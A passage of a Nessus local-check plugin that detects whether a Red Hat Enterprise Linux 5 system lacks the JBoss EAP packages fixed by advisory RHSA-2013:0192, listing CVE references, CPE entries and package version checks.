(CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum\nfor reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project\nfor reporting CVE-2012-2379; and Tyler Krpata for reporting\nCVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by\nCarlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of\nRed Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and\nCVE-2012-2377 was discovered by Red Hat.\"\n );\n # https://access.redhat.com/knowledge/docs/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/documentation/en-us/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0192\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0034\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2379\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3546\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-5478\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3370\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2730\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0874\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:aopalliance\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bsh2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bsh2-bsf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:google-guice\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hornetq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hornetq-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jacorb-jboss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:javassist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-aop2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-logmanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-messaging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-naming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-reflect\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-vfs2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-hornetq\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-messaging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-tp-licenses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbosssx2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-framework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jgroups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:netty\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-federation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-eap-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-eap-docs-examples\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-ant-bundle-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-common-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-dbutils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-domain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugindoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-filetemplate-bundle-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-plugin-validator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-pluginAnnotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-pluginGen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-rtfilter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-aop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-context\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wss4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-security\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0192\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! 
(rpm_exists(release:\"RHEL5\", rpm:\"jbossas-client-\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL5\", reference:\"aopalliance-1.0-5.2.jdk6.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"apache-cxf-2.2.12-6.1.patch_04.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bsh2-2.0-0.b4.15.1.patch01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bsh2-bsf-2.0-0.b4.15.1.patch01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glassfish-jaxb-2.1.12-12_patch_03.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"google-guice-2.0-3.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-3.3.2-1.5.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-annotations-3.4.0-3.3.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-annotations-javadoc-3.4.0-3.3.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-entitymanager-3.4.0-4.4.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-entitymanager-javadoc-3.4.0-4.4.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-javadoc-3.3.2-1.5.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-search-3.1.1-2.4.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-search-javadoc-3.1.1-2.4.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hornetq-2.2.24-1.EAP.GA.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"hornetq-native-2.2.20-1.EAP.GA.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"hornetq-native-2.2.20-1.EAP.GA.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jacorb-jboss-2.3.2-2.jboss_1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", 
reference:\"javassist-3.12.0-6.SP1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-aop2-2.1.6-5.CP06.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-bootstrap-1.0.2-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-cache-core-3.2.11-1.GA.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-cache-pojo-3.0.1-1.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-cl-2.0.11-1.GA.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-cluster-ha-server-api-1.2.1-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-common-beans-1.0.1-2.1.Final.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-common-core-2.2.21-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb-3.0-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-cache-1.0.0-4.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-core-1.3.9-0.4.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-ext-api-1.0.0-4.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-ext-api-impl-1.0.0-3.7.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-interceptors-1.0.9-0.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-metadata-1.0.0-3.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-metrics-deployer-1.1.1-0.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-security-1.0.2-0.5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-timeout-0.1.1-0.5.ep5.el5\")) 
flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-timeout-3.0-api-0.1.1-0.5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-timeout-spi-0.1.1-0.5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-transactions-1.0.2-1.4.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jacc-1.1-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jad-1.2-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jaspi-1.0-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-javaee-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-javaee-poms-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jaxrpc-api_1.1_spec-1.0.0-16.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jca-1.5-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jms-1.1-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jpa-deployers-1.0.0-6.1SP2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-logmanager-1.1.2-6.GA_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-messaging-1.4.8-12.SP9.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-naming-5.0.3-5.1.CP02.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-reflect-2.0.4-2.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-remoting-2.5.4-10.SP4.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-seam2-2.2.6.EAP5-10.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-seam2-docs-2.2.6.EAP5-10.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-seam2-examples-2.2.6.EAP5-10.ep5.el5\")) 